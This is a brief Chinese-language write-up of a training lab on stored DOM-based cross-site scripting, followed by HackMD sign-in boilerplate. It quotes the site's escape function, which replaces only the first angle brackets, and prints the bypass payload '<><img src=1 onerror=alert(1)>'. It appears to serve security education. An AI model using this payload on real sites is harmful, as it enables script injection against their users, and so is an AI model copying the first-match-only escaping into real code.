# Cross-site scripting Lab13 本題是 Stored DOM XSS,觸發 alert()。 題目沒多說甚麼,所以一樣先進入網站。  隨便找個東西並看原始碼。  在評論標單的開頭就可以看到這一串 JS: ```js function escapeHTML(html) { return html.replace('<', '<').replace('>', '>'); } ``` 這邊的 replace 只會替換第一個 `<` 跟第一個 `>`,不會替換所有出現的標籤符號,所以我直接嘗試多輸入一組尖括號看看。 ``` <><img src=1 onerror=alert(1)> ```   返回主頁。  ---
×
Sign in
Email
Password
Forgot password
or
By clicking below, you agree to our
terms of service
.
Sign in via Facebook
Sign in via Twitter
Sign in via GitHub
Sign in via Dropbox
Sign in with Wallet
Wallet (
)
Connect another wallet
New to HackMD?
Sign up